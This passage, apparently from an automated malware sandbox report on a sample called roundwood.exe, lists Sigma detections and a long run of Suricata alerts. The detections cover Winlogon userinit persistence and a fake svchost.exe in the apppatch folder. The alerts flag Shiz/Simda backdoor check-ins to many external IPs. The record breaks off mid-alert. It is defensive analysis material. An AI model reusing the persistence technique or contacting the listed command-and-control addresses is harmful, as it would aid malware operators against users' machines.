Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 5284, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\roundwood.exe", ParentImage: C:\Users\user\Desktop\roundwood.exe, ParentProcessId: 5852, ParentProcessName: roundwood.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 5284, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\roundwood.exe", ParentImage: C:\Users\user\Desktop\roundwood.exe, ParentProcessId: 5852, ParentProcessName: roundwood.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 5284, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:42:19.845636+0200
SID:	2803437
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:42:19.845636+0200
SID:	2804852
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 103.224.182.252

Timestamp:	2024-08-23T18:44:06.016069+0200
SID:	2803437
Severity:	1
Source Port:	50853
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 103.224.182.252

Timestamp:	2024-08-23T18:44:06.016069+0200
SID:	2804852
Severity:	1
Source Port:	50853
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:43:06.834133+0200
SID:	2803437
Severity:	1
Source Port:	63517
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:43:06.834133+0200
SID:	2804852
Severity:	1
Source Port:	63517
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:42:12.965416+0200
SID:	2803437
Severity:	1
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:42:12.965416+0200
SID:	2804852
Severity:	1
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:43:29.703955+0200
SID:	2803437
Severity:	1
Source Port:	62686
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:43:29.703955+0200
SID:	2804852
Severity:	1
Source Port:	62686
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:43:35.057591+0200
SID:	2803437
Severity:	1
Source Port:	59536
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:43:35.057591+0200
SID:	2804852
Severity:	1
Source Port:	59536
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:44:05.672351+0200
SID:	2803437
Severity:	1
Source Port:	50852
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:44:05.672351+0200
SID:	2804852
Severity:	1
Source Port:	50852
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:47.523223+0200
SID:	2803437
Severity:	1
Source Port:	50842
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:47.523223+0200
SID:	2804852
Severity:	1
Source Port:	50842
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:42:14.285919+0200
SID:	2803437
Severity:	1
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:42:14.285919+0200
SID:	2804852
Severity:	1
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:13.792588+0200
SID:	2803437
Severity:	1
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:13.792588+0200
SID:	2804852
Severity:	1
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:42:12.841493+0200
SID:	2803437
Severity:	1
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:42:12.841493+0200
SID:	2804852
Severity:	1
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:03.463861+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	62838
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:03.806190+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	63695
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:37.247409+0200
SID:	2804852
Severity:	1
Source Port:	59543
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:14.780163+0200
SID:	2804852
Severity:	1
Source Port:	49721
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:46.293135+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	50088
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:43:06.931526+0200
SID:	2803437
Severity:	1
Source Port:	63518
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:43:06.931526+0200
SID:	2804852
Severity:	1
Source Port:	63518
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:43:37.767067+0200
SID:	2803437
Severity:	1
Source Port:	59544
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:43:37.767067+0200
SID:	2804852
Severity:	1
Source Port:	59544
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:44:06.377470+0200
SID:	2803437
Severity:	1
Source Port:	50851
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:44:06.377470+0200
SID:	2804852
Severity:	1
Source Port:	50851
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz - Source IP: 44.221.84.105 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:12.933029+0200
SID:	2018141
Severity:	1
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 44.221.84.105 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:12.933029+0200
SID:	2037771
Severity:	1
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:42:12.784899+0200
SID:	2803437
Severity:	1
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:42:12.784899+0200
SID:	2804852
Severity:	1
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:42:13.180850+0200
SID:	2803437
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:42:13.180850+0200
SID:	2804852
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:43:35.027705+0200
SID:	2803437
Severity:	1
Source Port:	59532
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:43:35.027705+0200
SID:	2804852
Severity:	1
Source Port:	59532
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:03.648757+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	62631
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:43:35.103902+0200
SID:	2803437
Severity:	1
Source Port:	59528
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:43:35.103902+0200
SID:	2804852
Severity:	1
Source Port:	59528
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:42:14.726822+0200
SID:	2803437
Severity:	1
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:42:14.726822+0200
SID:	2804852
Severity:	1
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:42:24.303230+0200
SID:	2803437
Severity:	1
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:42:24.303230+0200
SID:	2804852
Severity:	1
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 103.224.212.210

Timestamp:	2024-08-23T18:43:07.276878+0200
SID:	2803437
Severity:	1
Source Port:	63519
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 103.224.212.210

Timestamp:	2024-08-23T18:43:07.276878+0200
SID:	2804852
Severity:	1
Source Port:	63519
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:42:13.059217+0200
SID:	2803437
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:42:13.059217+0200
SID:	2804852
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:43:07.701206+0200
SID:	2803437
Severity:	1
Source Port:	63521
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:43:07.701206+0200
SID:	2804852
Severity:	1
Source Port:	63521
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:57.405298+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	53531
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:42:12.969463+0200
SID:	2803437
Severity:	1
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:42:12.969463+0200
SID:	2804852
Severity:	1
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:43:36.336824+0200
SID:	2803437
Severity:	1
Source Port:	59534
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 199.191.50.83

Timestamp:	2024-08-23T18:43:36.336824+0200
SID:	2804852
Severity:	1
Source Port:	59534
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:43:48.600216+0200
SID:	2803437
Severity:	1
Source Port:	50844
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:43:48.600216+0200
SID:	2804852
Severity:	1
Source Port:	50844
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 52.34.198.229

Timestamp:	2024-08-23T18:43:31.676842+0200
SID:	2803437
Severity:	1
Source Port:	49369
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 52.34.198.229

Timestamp:	2024-08-23T18:43:31.676842+0200
SID:	2804852
Severity:	1
Source Port:	49369
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:42:29.671762+0200
SID:	2803437
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:42:29.671762+0200
SID:	2804852
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-08-23T18:42:13.792580+0200
SID:	2804852
Severity:	1
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 69.162.80.57

Timestamp:	2024-08-23T18:42:13.140368+0200
SID:	2803437
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 69.162.80.57

Timestamp:	2024-08-23T18:42:13.140368+0200
SID:	2804852
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:43:28.678792+0200
SID:	2803437
Severity:	1
Source Port:	62684
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:43:28.678792+0200
SID:	2804852
Severity:	1
Source Port:	62684
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:48.002079+0200
SID:	2804852
Severity:	1
Source Port:	50846
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 103.224.212.210

Timestamp:	2024-08-23T18:44:06.122015+0200
SID:	2803437
Severity:	1
Source Port:	61321
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 103.224.212.210

Timestamp:	2024-08-23T18:44:06.122015+0200
SID:	2804852
Severity:	1
Source Port:	61321
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:43:03.621686+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	52863
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 69.162.80.57

Timestamp:	2024-08-23T18:43:35.112054+0200
SID:	2803437
Severity:	1
Source Port:	59538
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 69.162.80.57

Timestamp:	2024-08-23T18:43:35.112054+0200
SID:	2804852
Severity:	1
Source Port:	59538
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:43:38.456170+0200
SID:	2803437
Severity:	1
Source Port:	59545
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:43:38.456170+0200
SID:	2804852
Severity:	1
Source Port:	59545
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:01.800134+0200
SID:	2804852
Severity:	1
Source Port:	60696
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:57.224227+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	50316
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz - Source IP: 3.94.10.34 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:12.965688+0200
SID:	2018141
Severity:	1
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 3.94.10.34 - Destination IP: 192.168.2.5

Timestamp:	2024-08-23T18:42:12.965688+0200
SID:	2037771
Severity:	1
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:51.440659+0200
SID:	2804852
Severity:	1
Source Port:	50848
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:43:35.574502+0200
SID:	2804852
Severity:	1
Source Port:	59539
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:43:45.947600+0200
SID:	2803437
Severity:	1
Source Port:	59546
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:43:45.947600+0200
SID:	2804852
Severity:	1
Source Port:	59546
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:42:28.944979+0200
SID:	2804852
Severity:	1
Source Port:	49737
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:43:38.160164+0200
SID:	2803437
Severity:	1
Source Port:	59544
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:43:38.160164+0200
SID:	2804852
Severity:	1
Source Port:	59544
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:42:36.380226+0200
SID:	2803437
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:42:36.380226+0200
SID:	2804852
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.5 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:43:35.179648+0200
SID:	2803437
Severity:	1
Source Port:	59537
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.5 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:43:35.179648+0200
SID:	2804852
